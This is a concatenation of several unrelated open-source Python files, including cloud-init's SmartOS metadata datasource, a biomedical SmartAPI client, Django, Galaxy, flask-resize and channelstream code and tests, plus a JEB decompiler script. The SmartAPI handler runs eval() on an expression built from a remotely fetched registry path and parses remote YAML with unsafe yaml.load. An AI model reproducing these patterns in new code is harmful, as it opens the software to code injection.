write_boot_content(md.get('user-script'), content_f=user_script,
link=u_script_l, shebang=True, mode=0o700)
operator_script = os.path.join(data_d, 'operator-script')
write_boot_content(md.get('operator-script'),
content_f=operator_script, shebang=False,
mode=0o700)
# @datadictionary: This key has no defined format, but its value
# is written to the file /var/db/mdata-user-data on each boot prior
# to the phase that runs user-script. This file is not to be executed.
# This allows a configuration file of some kind to be injected into
# the machine to be consumed by the user-script when it runs.
u_data = md.get('legacy-user-data')
u_data_f = "%s/mdata-user-data" % LEGACY_USER_D
write_boot_content(u_data, u_data_f)
# Handle the cloud-init regular meta
if not md['local-hostname']:
md['local-hostname'] = md['instance-id']
ud = None
if md['user-data']:
ud = md['user-data']
if not md['vendor-data']:
md['vendor-data'] = BUILTIN_VENDOR_DATA % {
'user_script': user_script,
'operator_script': operator_script,
'per_boot_d': os.path.join(self.paths.get_cpath("scripts"),
'per-boot'),
}
self.metadata = util.mergemanydict([md, self.metadata])
self.userdata_raw = ud
self.vendordata_raw = md['vendor-data']
self.network_data = md['network-data']
self._set_provisioned()
return True
def device_name_to_device(self, name):
return self.ds_cfg['disk_aliases'].get(name)
def get_config_obj(self):
if self.smartos_type == SMARTOS_ENV_KVM:
return BUILTIN_CLOUD_CONFIG
return {}
def get_instance_id(self):
return self.metadata['instance-id']
@property
def network_config(self):
if self._network_config is None:
if self.network_data is not None:
self._network_config = (
convert_smartos_network_data(
network_data=self.network_data,
dns_servers=self.metadata['dns_servers'],
dns_domain=self.metadata['dns_domain']))
return self._network_config
class JoyentMetadataFetchException(Exception):
pass
class JoyentMetadataClient(object):
"""
A client implementing v2 of the Joyent Metadata Protocol Specification.
The full specification can be found at
http://eng.joyent.com/mdata/protocol.html
"""
line_regex = re.compile(
r'V2 (?P<length>\d+) (?P<checksum>[0-9a-f]+)'
r' (?P<body>(?P<request_id>[0-9a-f]+) (?P<status>SUCCESS|NOTFOUND)'
r'( (?P<payload>.+))?)')
def __init__(self, smartos_type=None, fp=None):
if smartos_type is None:
smartos_type = get_smartos_environ()
self.smartos_type = smartos_type
self.fp = fp
def _checksum(self, body):
return '{0:08x}'.format(
binascii.crc32(body.encode('utf-8')) & 0xffffffff)
def _get_value_from_frame(self, expected_request_id, frame):
frame_data = self.line_regex.match(frame).groupdict()
if int(frame_data['length']) != len(frame_data['body']):
raise JoyentMetadataFetchException(
'Incorrect frame length given ({0} != {1}).'.format(
frame_data['length'], len(frame_data['body'])))
expected_checksum = self._checksum(frame_data['body'])
if frame_data['checksum'] != expected_checksum:
raise JoyentMetadataFetchException(
'Invalid checksum (expected: {0}; got {1}).'.format(
expected_checksum, frame_data['checksum']))
if frame_data['request_id'] != expected_request_id:
raise JoyentMetadataFetchException(
'Request ID mismatch (expected: {0}; got {1}).'.format(
expected_request_id, frame_data['request_id']))
if not frame_data.get('payload', None):
LOG.debug('No value found.')
return None
value = util.b64d(frame_data['payload'])
LOG.debug('Value "%s" found.', value)
return value
def request(self, rtype, param=None):
request_id = '{0:08x}'.format(random.randint(0, 0xffffffff))
message_body = ' '.join((request_id, rtype,))
if param:
message_body += ' ' + base64.b64encode(param.encode()).decode()
msg = 'V2 {0} {1} {2}\n'.format(
len(message_body), self._checksum(message_body), message_body)
LOG.debug('Writing "%s" to metadata transport.', msg)
need_close = False
if not self.fp:
self.open_transport()
need_close = True
self.fp.write(msg.encode('ascii'))
self.fp.flush()
response = bytearray()
response.extend(self.fp.read(1))
while response[-1:] != b'\n':
response.extend(self.fp.read(1))
if need_close:
self.close_transport()
response = response.rstrip().decode('ascii')
LOG.debug('Read "%s" from metadata transport.', response)
if 'SUCCESS' not in response:
return None
value = self._get_value_from_frame(request_id, response)
return value
def get(self, key, default=None, strip=False):
result = self.request(rtype='GET', param=key)
if result is None:
return default
if result and strip:
result = result.strip()
return result
def get_json(self, key, default=None):
result = self.get(key, default=default)
if result is None:
return default
return json.loads(result)
def list(self):
result = self.request(rtype='KEYS')
if result:
result = result.split('\n')
return result
def put(self, key, val):
param = b' '.join([base64.b64encode(i.encode())
for i in (key, val)]).decode()
return self.request(rtype='PUT', param=param)
def delete(self, key):
return self.request(rtype='DELETE', param=key)
def close_transport(self):
if self.fp:
self.fp.close()
self.fp = None
def __enter__(self):
if self.fp:
return self
self.open_transport()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close_transport()
return
def open_transport(self):
raise NotImplementedError
class JoyentMetadataSocketClient(JoyentMetadataClient):
def __init__(self, socketpath, smartos_type=SMARTOS_ENV_LX_BRAND):
super(JoyentMetadataSocketClient, self).__init__(smartos_type)
self.socketpath = socketpath
def open_transport(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.socketpath)
self.fp = sock.makefile('rwb')
def exists(self):
return os.path.exists(self.socketpath)
def __repr__(self):
return "%s(socketpath=%s)" % (self.__class__.__name__, self.socketpath)
class JoyentMetadataSerialClient(JoyentMetadataClient):
def __init__(self, device, timeout=10, smartos_type=SMARTOS_ENV_KVM):
super(JoyentMetadataSerialClient, self).__init__(smartos_type)
self.device = device
self.timeout = timeout
def exists(self):
return os.path.exists(self.device)
def open_transport(self):
ser = serial.Serial(self.device, timeout=self.timeout)
if not ser.isOpen():
raise SystemError("Unable to open %s" % self.device)
self.fp = ser
def __repr__(self):
return "%s(device=%s, timeout=%s)" % (
self.__class__.__name__, self.device, self.timeout)
class JoyentMetadataLegacySerialClient(JoyentMetadataSerialClient):
"""V1 of the protocol was not safe for all values.
Thus, we allowed the user to pass values in as base64 encoded.
Users may still reasonably expect to be able to send base64 data
and have it transparently decoded. So even though the V2 format is
now used, and is safe (using base64 itself), we keep legacy support.
The way for a user to do this was:
a.) specify 'base64_keys' key whose value is a comma delimited
list of keys that were base64 encoded.
b.) base64_all: string interpreted as a boolean that indicates
if all keys are base64 encoded.
c.) set a key named b64-<keyname> with a boolean indicating that
<keyname> is base64 encoded."""
def __init__(self, device, timeout=10, smartos_type=None):
s = super(JoyentMetadataLegacySerialClient, self)
s.__init__(device, timeout, smartos_type)
self.base64_keys = None
self.base64_all = None
def _init_base64_keys(self, reset=False):
if reset:
self.base64_keys = None
self.base64_all = None
keys = None
if self.base64_all is None:
keys = self.list()
if 'base64_all' in keys:
self.base64_all = util.is_true(self._get("base64_all"))
else:
self.base64_all = False
if self.base64_all:
# short circuit if base64_all is true
return
if self.base64_keys is None:
if keys is None:
keys = self.list()
b64_keys = set()
if 'base64_keys' in keys:
b64_keys = set(self._get("base64_keys").split(","))
# now add any b64-<keyname> that has a true value
for key in [k[3:] for k in keys if k.startswith("b64-")]:
if util.is_true(self._get(key)):
b64_keys.add(key)
else:
if key in b64_keys:
b64_keys.remove(key)
self.base64_keys = b64_keys
def _get(self, key, default=None, strip=False):
return (super(JoyentMetadataLegacySerialClient, self).
get(key, default=default, strip=strip))
def is_b64_encoded(self, key, reset=False):
if key in NO_BASE64_DECODE:
return False
self._init_base64_keys(reset=reset)
if self.base64_all:
return True
return key in self.base64_keys
def get(self, key, default=None, strip=False):
mdefault = object()
val = self._get(key, strip=False, default=mdefault)
if val is mdefault:
return default
if self.is_b64_encoded(key):
try:
val = base64.b64decode(val.encode()).decode()
# Bogus input produces different errors in Python 2 and 3
except (TypeError, binascii.Error):
LOG.warn("Failed base64 decoding key '%s': %s", key, val)
if strip:
val = val.strip()
return val
def jmc_client_factory(
smartos_type=None, metadata_sockfile=METADATA_SOCKFILE,
serial_device=SERIAL_DEVICE, serial_timeout=SERIAL_TIMEOUT,
uname_version=None):
if smartos_type is None:
smartos_type = get_smartos_environ(uname_version)
if smartos_type is None:
return None
elif smartos_type == SMARTOS_ENV_KVM:
return JoyentMetadataLegacySerialClient(
device=serial_device, timeout=serial_timeout,
smartos_type=smartos_type)
elif smartos_type == SMARTOS_ENV_LX_BRAND:
return JoyentMetadataSocketClient(socketpath=metadata_sockfile,
smartos_type=smartos_type)
raise ValueError("Unknown value for smartos_type: %s" % smartos_type)
def write_boot_content(content, content_f, link=None, shebang=False,
mode=0o400):
"""
Write the content to content_f. Under the following rules:
1. If no content, remove the file
2. Write the content
3. If executable and no file magic, add it
4. If there is a link, create it
@param content: what to write
@param content_f: the file name
@param backup_d: the directory to save the backup at
@param link: if defined, location to create a symlink to
@param shebang: if no file magic, set shebang
@param mode: file mode
Becuase of the way that Cloud-init executes scripts (no shell),
a script will fail to execute if does not have a magic bit (shebang) set
for the file. If shebang=True, then the script will be checked for a magic
bit and to the SmartOS default of assuming that bash.
"""
if not content and os.path.exists(content_f):
os.unlink(content_f)
if link and os.path.islink(link):
os.unlink(link)
if not content:
return
util.write_file(content_f, content, mode=mode)
if shebang and not content.startswith("#!"):
try:
cmd = ["file", "--brief", "--mime-type", content_f]
(f_type, _err) = util.subp(cmd)
LOG.debug("script %s mime type is %s", content_f, f_type)
if f_type.strip() == "text/plain":
new_content = "\n".join(["#!/bin/bash", content])
util.write_file(content_f, new_content, mode=mode)
LOG.debug("added shebang to file %s", content_f)
except Exception as e:
util.logexc(LOG, ("Failed to identify script type for %s" %
content_f, e))
if link:
try:
if os.path.islink(link):
os.unlink(link)
if content and os.path.exists(content_f):
util.ensure_dir(os.path.dirname(link))
os.symlink(content_f, link)
except IOError as e:
util.logexc(LOG, "failed establishing content link: %s", e)
def get_smartos_environ(uname_version=None, product_name=None):
uname = os.uname()
# SDC LX-Brand Zones lack dmidecode (no /dev/mem) but
# report 'BrandZ virtual linux' as the kernel version
if uname_version is None:
uname_version = uname[3]
if uname_version.lower() == 'brandz virtual linux':
return SMARTOS_ENV_LX_BRAND
if product_name is None:
system_type = util.read_dmi_data("system-product-name")
else:
system_type = product_name
if system_type and 'smartdc' in system_type.lower():
return SMARTOS_ENV_KVM
return None
# Convert SMARTOS 'sdc:nics' data to network_config yaml
def convert_smartos_network_data(network_data=None,
dns_servers=None, dns_domain=None):
"""Return a dictionary of network_config by parsing provided
SMARTOS sdc:nics configuration data
sdc:nics data is a dictionary of properties of a nic and the ip
configuration desired. Additional nic dictionaries are appended
to the list.
Converting the format is straightforward though it does include
duplicate information as well as data which appears to be relevant
to the hostOS rather than the guest.
For each entry in the nics list returned from query sdc:nics, we
create a type: physical entry, and extract the interface properties:
'mac' -> 'mac_address', 'mtu', 'interface' -> 'name'. The remaining
keys are related to ip configuration. For each ip in the 'ips' list
we create a subnet entry under 'subnets' pairing the ip to a one in
the 'gateways' list.
"""
valid_keys = {
'physical': [
'mac_address',
'mtu',
'name',
'params',
'subnets',
'type',
],
'subnet': [
'address',
'broadcast',
'dns_nameservers',
'dns_search',
'metric',
'pointopoint',
'routes',
'scope',
'type',
],
}
if dns_servers:
if not isinstance(dns_servers, (list, tuple)):
dns_servers = [dns_servers]
else:
dns_servers = []
if dns_domain:
if not isinstance(dns_domain, (list, tuple)):
dns_domain = [dns_domain]
else:
dns_domain = []
def is_valid_ipv4(addr):
return '.' in addr
def is_valid_ipv6(addr):
return ':' in addr
pgws = {
'ipv4': {'match': is_valid_ipv4, 'gw': None},
'ipv6': {'match': is_valid_ipv6, 'gw': None},
}
config = []
for nic in network_data:
cfg = dict((k, v) for k, v in nic.items()
if k in valid_keys['physical'])
cfg.update({
'type': 'physical',
'name': nic['interface']})
if 'mac' in nic:
cfg.update({'mac_address': nic['mac']})
subnets = []
for ip in nic.get('ips', []):
if ip == "dhcp":
subnet = {'type': 'dhcp4'}
else:
subnet = dict((k, v) for k, v in nic.items()
if k in valid_keys['subnet'])
subnet.update({
'type': 'static',
'address': ip,
})
proto = 'ipv4' if is_valid_ipv4(ip) else 'ipv6'
# Only use gateways for 'primary' nics
if 'primary' in nic and nic.get('primary', False):
# the ips and gateways list may be N to M, here
# we map the ip index into the gateways list,
# and handle the case that we could have more ips
# than gateways. we only consume the first gateway
if not pgws[proto]['gw']:
gateways = [gw for gw in nic.get('gateways', [])
if pgws[proto]['match'](gw)]
if len(gateways):
pgws[proto]['gw'] = gateways[0]
subnet.update({'gateway': pgws[proto]['gw']})
subnets.append(subnet)
cfg.update({'subnets': subnets})
config.append(cfg)
if dns_servers:
config.append(
{'type': 'nameserver', 'address': dns_servers,
'search': dns_domain})
return {'version': 1, 'config': config}
# Used to match classes to dependencies
datasources = [
(DataSourceSmartOS, (sources.DEP_FILESYSTEM, )),
]
# Return a list of data sources that match this set of dependencies
def get_datasource_list(depends):
return sources.list_from_depends(depends, datasources)
if __name__ == "__main__":
import sys
jmc = jmc_client_factory()
if jmc is None:
print("Do not appear to be on smartos.")
sys.exit(1)
if len(sys.argv) == 1:
keys = (list(SMARTOS_ATTRIB_JSON.keys()) +
list(SMARTOS_ATTRIB_MAP.keys()) + ['network_config'])
else:
keys = sys.argv[1:]
def load_key(client, key, data):
if key in data:
return data[key]
if key in SMARTOS_ATTRIB_JSON:
keyname = SMARTOS_ATTRIB_JSON[key]
data[key] = client.get_json(keyname)
elif key == "network_config":
for depkey in ('network-data', 'dns_servers', 'dns_domain'):
load_key(client, depkey, data)
data[key] = convert_smartos_network_data(
network_data=data['network-data'],
dns_servers=data['dns_servers'],
dns_domain=data['dns_domain'])
else:
if key in SMARTOS_ATTRIB_MAP:
keyname, strip = SMARTOS_ATTRIB_MAP[key]
else:
keyname, strip = (key, False)
data[key] = client.get(keyname, strip=strip)
return data[key]
data = {}
for key in keys:
load_key(client=jmc, key=key, data=data)
print(json.dumps(data, indent=1, sort_keys=True,
separators=(',', ': ')))
|
prometheanfire/cloud-init
|
cloudinit/sources/DataSourceSmartOS.py
|
Python
|
gpl-3.0
| 29,325 | 0 |
#
# CDR-Stats License
# http://www.cdr-stats.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2015 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <info@star2billing.com>
#
from django.contrib.auth.models import User
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.authentication import BasicAuthentication, SessionAuthentication
from rest_framework import viewsets
from apirest.user_serializers import UserSerializer
#from permissions import CustomObjectPermissions
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all()
serializer_class = UserSerializer
authentication = (BasicAuthentication, SessionAuthentication)
permission_classes = (IsAuthenticatedOrReadOnly, )
|
Star2Billing/cdr-stats
|
cdr_stats/apirest/view_user.py
|
Python
|
mpl-2.0
| 1,041 | 0.001921 |
import requests
import json
import yaml
import pandas as pd
import pprint
from jsonld_processor import jsonld2nquads, fetchvalue
from utils import int2str
class SmartAPIHandler:
def __init__(self):
# description info about endpoint, bioentity and api
self.endpoint_info = {}
self.bioentity_info = {}
self.api_info = {}
self.parse_id_mapping()
self.parse_openapi()
self.relation = {}
def find_base(self, d, relation={}):
for k, v in d.items():
if isinstance(v, dict) and "@context" in v and "@base" in v["@context"]:
if v["@context"]["@base"] not in relation:
relation[v["@context"]["@base"]] = [v["@id"]]
elif v["@context"]["@base"] in relation and v["@id"] not in relation[v["@context"]["@base"]]:
relation[v["@context"]["@base"]].append(v["@id"])
elif isinstance(v, dict):
self.find_base(v,relation=relation)
return relation
'''
This function parse the jsonld file and return relation, output info
'''
def context2relation(self, context_url):
context = requests.get(context_url).json()
return self.find_base(context, relation={})
'''
This function parse the openapi yml file, and organize info into endpoints and apis
'''
def parse_openapi(self):
api_list_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/API_LIST.yml'
api_list = yaml.load(requests.get(api_list_url).content)['APIs']
# path to fetch openapi yml file for each api
metadata_url_prefix = "https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/"
for _api in api_list:
openapi_url = metadata_url_prefix + _api['metadata']
# check if the openapi file for the api exists first
if requests.get(openapi_url).status_code == 200:
# retrieve openapi file
openapi_file = requests.get(openapi_url).content
data = yaml.load(openapi_file)
self.api_info[data['info']['title']] = {'info': data['info'], 'servers': data['servers'], 'endpoints': []}
for _name, _info in data['paths'].items():
self.endpoint_info[data['servers'][0]['url'] + _name] = _info
_output = [_item['valueType'] for _item in _info['get']['responses']['200']['x-responseValueType']]
relation = {}
if 'x-JSONLDContext' in _info['get']['responses']['200']:
relation = self.context2relation(_info['get']['responses']['200']['x-JSONLDContext'])
for _op in _output:
if _op not in relation:
relation[_op] = ['ont:is_related_to']
self.endpoint_info[data['servers'][0]['url'] + _name].update({'output': _output, 'relation': relation})
self.api_info[data['info']['title']]['endpoints'].append(data['servers'][0]['url'] + _name)
else:
print("invalid url for openapi: {}".format(openapi_url))
'''
construct requests params/data, based on input type and value
only handle 'in' value which is body or query
'''
def api_call_constructor(self, uri, value, endpoint_name):
results = {}
method = type(value) == list and 'post' or 'get'
for _para in self.endpoint_info[endpoint_name][method]['parameters']:
# handle cases where input value is part of the url
if _para['in'] == 'path':
data = requests.get(endpoint_name.replace('{' + _para['name'] + '}', value))
return data
else:
# check whether the parameter is required
if _para['required']:
# if the para has a request template, then put value into the placeholder {{input}}
if 'x-requestTemplate' in _para:
for _template in _para['x-requestTemplate']:
if _template['valueType'] == 'default':
results[_para['name']] = _template['template'].replace('{{input}}', value)
elif uri == _template['valueType']:
results[_para['name']] = _template['template'].replace('{{input}}', value)
else:
results[_para['name']] = value
if type(value) != list:
data = requests.get(endpoint_name, params=results)
else:
data = requests.post(endpoint_name, data=results)
return data
'''
parse the uri_id mapping file, return a dict containing id mapping info indexed by uri
'''
def parse_id_mapping(self):
file_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/ID_MAPPING.csv'
data = pd.read_csv(file_url, encoding = "ISO-8859-1")
for index, row in data.iterrows():
self.bioentity_info[row['URI']] = {'registry_identifier': row[2], 'alternative_names': row[3], 'description': row[4], 'identifier_pattern': row[5], 'preferred_name': row[1], 'type': row[6]}
return self.bioentity_info
'''
fetch endpoint jsonld contextinformation
'''
def fetch_context(self, endpoint_name):
file_url = self.endpoint_info[endpoint_name]['get']['responses']['200']['x-JSONLDContext']
return requests.get(file_url).json()
'''
input: user provide input/output
output: return endpoint(s) which could take the input and return the output
'''
def api_endpoint_locator(self, input, output):
endpoint_list = []
for _endpoint, _info in self.endpoint_info.items():
if input in _info['get']['parameters'][0]['x-valueType'] and output in _info['output']:
endpoint_list.append(_endpoint)
return endpoint_list
'''
make api calls based on input, endpoint
'''
def call_api(self, input, value, endpoint, output):
json_doc = self.api_call_constructor(input, value, endpoint).json()
int2str(json_doc)
if endpoint.startswith('http://myvariant.info/'):
if "_id" in json_doc:
json_doc["_id"] = json_doc["_id"].replace(':', '-')
elif "hits" in json_doc:
for _doc in json_doc["hits"]:
if "_id" in _doc:
_doc['_id'] = _doc['_id'].replace(":", "-")
output_type = self.bioentity_info[output]['type']
if output_type == 'Entity':
jsonld_context = self.fetch_context(endpoint)
json_doc.update(jsonld_context)
# parse output nquads
nquads = jsonld2nquads(json_doc)
outputs = list(set(fetchvalue(nquads, output)))
return (outputs,output_type)
else:
response = self.endpoint_info[endpoint]['get']['responses']['200']['x-responseValueType']
for _response in response:
if _response['valueType'] == output:
output_path = _response['path']
outputs_command = 'json_doc'
for _item in output_path.split('.'):
outputs_command += ('["' + _item + '"]')
outputs = eval(outputs_command)
return (outputs, output_type)
|
kevinxin90/biothings_explorer_jupyter_notebook
|
api_handler.py
|
Python
|
apache-2.0
| 7,479 | 0.00361 |
import galaxy.model
from galaxy.model.orm import *
from base.twilltestcase import TwillTestCase
class TestMetadataEdit( TwillTestCase ):
def test_00_metadata_edit( self ):
"""test_metadata_edit: Testing metadata editing"""
self.logout()
self.login( email='test@bx.psu.edu' )
self.new_history( name='Test Metadata Edit' )
global history1
history1 = galaxy.model.History.query() \
.order_by( desc( galaxy.model.History.table.c.create_time ) ).first()
self.upload_file( '1.bed' )
latest_hda = galaxy.model.HistoryDatasetAssociation.query() \
.order_by( desc( galaxy.model.HistoryDatasetAssociation.table.c.create_time ) ).first()
self.home()
# Due to twill not being able to handle the permissions forms, we'll eliminate
# DefaultHistoryPermissions prior to uploading a dataset so that the permission
# form will not be displayed on ted edit attributes page.
for dp in latest_hda.dataset.actions:
dp.delete()
dp.flush()
latest_hda.dataset.refresh()
self.check_history_for_string( '1.bed' )
self.check_metadata_for_string( '1.bed uploaded file unspecified (\?) chromCol value="1" selected endCol value="3" is_strandCol value="true" checked', hid=1 )
"""test editing attributes"""
self.edit_hda_attribute_info( hda_id=str( latest_hda.id ),
new_name='Testdata',
new_info="Uploaded my file",
new_dbkey='hg16',
new_startcol='6' )
self.check_metadata_for_string( 'Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="6" selected', hid=1 )
"""test Auto-detecting attributes"""
self.auto_detect_metadata( hda_id=str( latest_hda.id ) )
self.check_metadata_for_string('Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="2" selected', hid=1 )
"""test converting formats"""
self.convert_format( hda_id=str( latest_hda.id ), target_type='gff' )
self.check_metadata_for_string( '"gff" selected="yes"', hid=1 )
"""test changing data type"""
self.change_datatype( hda_id=str( latest_hda.id ), datatype='gff3' )
self.check_metadata_for_string( 'gff3', hid=1 )
self.delete_history( id=str( history1.id ) )
self.logout()
|
dbcls/dbcls-galaxy
|
test/functional/test_metadata_editing.py
|
Python
|
mit
| 2,489 | 0.023303 |
import os
import subprocess
import pytest
import flask_resize
from .decorators import requires_redis, slow
@pytest.fixture
def env(tmpdir, redis_cache):
basedir = tmpdir
conffile = tmpdir.join('flask-resize-conf.py')
conffile.write(
"""
RESIZE_URL = 'https://example.com'
RESIZE_ROOT = '{root}'
RESIZE_REDIS_HOST = '{redis_host}'
RESIZE_REDIS_KEY = '{cache_key}'
"""
.format(
root=str(basedir).replace('\\', '\\\\'),
redis_host=redis_cache._host,
cache_key=redis_cache.key,
).strip()
)
env = os.environ.copy()
# env = dict(PATH=os.environ['PATH'])
env.update(FLASK_RESIZE_CONF=str(conffile))
return env
def run(env, *args):
return subprocess.check_output(args, env=env).decode().splitlines()
@slow
def test_bin_usage(env):
assert 'usage: flask-resize' in run(env, 'flask-resize', '--help')[0]
@slow
def test_bin_list_images_empty(env):
assert run(env, 'flask-resize', 'list', 'images') == []
@slow
def test_bin_list_has_images(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
@requires_redis
@slow
def test_bin_list_cache_empty(env, redis_cache):
assert run(env, 'flask-resize', 'list', 'cache') == []
@requires_redis
@slow
def test_bin_list_has_cache(env, redis_cache):
redis_cache.add('hello')
redis_cache.add('buh-bye')
assert set(run(env, 'flask-resize', 'list', 'cache')) == \
{'hello', 'buh-bye'}
@slow
def test_bin_clear_images(
env,
resizetarget_opts,
image1_name,
image1_data
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
run(env, 'flask-resize', 'clear', 'images')
assert run(env, 'flask-resize', 'list', 'images') == []
@requires_redis
@slow
def test_bin_clear_cache(env, redis_cache):
redis_cache.add('foo bar')
assert run(env, 'flask-resize', 'clear', 'cache') == []
@requires_redis
@slow
def test_bin_sync_cache(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key,
redis_cache
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
redis_cache.clear()
assert run(env, 'flask-resize', 'list', 'cache') == []
run(env, 'flask-resize', 'sync', 'cache')
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
|
jmagnusson/Flask-Resize
|
tests/test_bin.py
|
Python
|
bsd-2-clause
| 2,759 | 0 |
from __future__ import unicode_literals
from frappe import _
def get_data():
return {
'fieldname': 'therapy_session',
'transactions': [
{
'label': _('Assessments'),
'items': ['Patient Assessment']
}
]
}
|
gsnbng/erpnext
|
erpnext/healthcare/doctype/therapy_session/therapy_session_dashboard.py
|
Python
|
agpl-3.0
| 226 | 0.044248 |
#!/usr/bin/python
#
# Copyright 2012 Anthony Campbell (anthonycampbell.co.uk)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Required imports
import os, getopt, sys, re, subprocess, exceptions
# Constants
_default_output_file = "./output.txt"
_script_directory = os.path.dirname(os.path.realpath(__file__))
# Help
_help = """
Clojure IMDB Parser
__file__ [options]
Simple wrapper script for the Clojure IMDB parser.
Options:
-q --query Option which specifies the query text.
-f --file Option which writes the search result to the defailt output file: __default_output_file__
-o --output [path/to/file] If specified, writes the search result to the a file.
-v --verbose Option to enable verbose output.
-h -? --help Option to display this text.
Examples:
__file__ -q "Clash of the Titans" -o output.txt
__file__ --query "Clash of the Titans" --output output.txt
"""
_help = _help.replace("__file__", __file__)
_help = _help.replace("__default_output_file__", _default_output_file)
# Main method
def main():
# Initialise variables
verbose = False
output = ""
query_term = ""
output_file = ""
latest_jar = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "q:fo:?hv", ["query=", "file", "output=", "help", "verbose"])
except getopt.GetoptError as error:
# Print help information and exit:
print "\n " + str(error)
print _help
sys.exit(2)
for option, argument in opts:
if option in ("-q", "--query"):
query_term = str(argument)
elif option in ("-f", "--file"):
output_file = _default_output_file
elif option in ("-o", "--output"):
output_file = str(argument)
elif option in ("-v", "--verbose"):
verbose = True
elif option in ("-h", "--help"):
print _help
sys.exit(0)
# Check we're good to go
if query_term == None or query_term == "":
print _help
sys.exit(2)
if verbose:
print "\n Clojure IMDB Parser"
try:
# Determine newest parser
process = subprocess.Popen(["ls -r " + _script_directory + "/release | grep \"clojure-imdb-parser.*.jar\" | head -n 1"],
stdout=subprocess.PIPE, shell=True)
latest_jar, stderr = process.communicate()
process.wait()
except exceptions.Exception as error:
print "\n Unable to find latest clojure-imdb-parser.jar:"
print "\n " + str(error)
sys.exit(1)
if latest_jar != None and str(latest_jar) != "":
latest_jar = _script_directory + "/release/" + str(latest_jar)
# Clean up path
pattern = re.compile(r'\n')
latest_jar = pattern.sub(" ", latest_jar).strip()
if verbose:
print "\n Latest clojure-imdb-parser.jar:"
print "\n " + latest_jar + "\n"
try:
# Execute the parser
process = subprocess.Popen(["java", "-jar", latest_jar, query_term, output_file, str(verbose)],
stdout=subprocess.PIPE)
output, stderr = process.communicate()
process.wait()
except exceptions.Exception as error:
print "\n Unable to execute clojure-imdb-parser.jar!"
print "\n " + str(error)
sys.exit(1)
else:
print "\n Unable to find latest clojure-imdb-parser.jar!"
sys.exit(1)
# Where we at?
print output
# If we're being run directly
if __name__ == "__main__":
main()
|
acampbell3000/clojure-imdb-parser
|
run.py
|
Python
|
apache-2.0
| 4,140 | 0.003623 |
# JEB sample script
# http://www.android-decompiler.com/
#
# AlertMarker.py
# Set(unset) alert marker to focued method.
#
# Copyright (c) 2013 SecureBrain
from jeb.api import IScript
from jeb.api.dex import Dex
from jeb.api.ui import View
import string
class AlertMarker(IScript):
def run(self, jeb):
self.jeb = jeb
self.dex = jeb.getDex()
self.ui = jeb.getUI()
success = self.start()
def start(self):
view = self.ui.getView(View.Type.ASSEMBLY)
msig = view.getCodePosition().getSignature()
md = self.dex.getMethodData(msig)
if not md:
print 'caret is not in method.'
return
f = md.getUserFlags()
print 'target:' + msig
if (f & Dex.FLAG_ALERT) == 0:
print 'set alert marker'
md.setUserFlags(f | Dex.FLAG_ALERT)
else:
print 'unset alert'
md.setUserFlags(f & ~Dex.FLAG_ALERT)
view.refresh()
|
SecureBrain/JEB-sample-scripts
|
AlertMarker.py
|
Python
|
mit
| 1,017 | 0.000983 |
from gevent import monkey
monkey.patch_all()
import pytest
import gevent
import marshmallow
from channelstream.server_state import get_state
from channelstream.channel import Channel
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestConnectViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {}
try:
connect(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert exc.messages == {"username": ["Missing data for required field."]}
def test_good_json(self, dummy_request, test_uuids):
server_state = get_state()
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "username",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
assert server_state.channels == {}
result = connect(dummy_request)
assert len(server_state.channels.keys()) == 2
assert "username" in server_state.users
assert test_uuids[1] in server_state.connections
assert result["channels"] == ["a", "aB"]
assert result["state"] == {"bar": "baz", "key": "foo"}
assert result["conn_id"] == test_uuids[1]
channels_info = result["channels_info"]["channels"]
assert len(channels_info.keys()) == 2
assert channels_info["a"]["total_users"] == 1
assert channels_info["a"]["total_connections"] == 1
assert channels_info["a"]["users"] == ["username"]
assert channels_info["a"]["history"] == []
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "username"}
]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUserStateViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Missing data for required field."]}
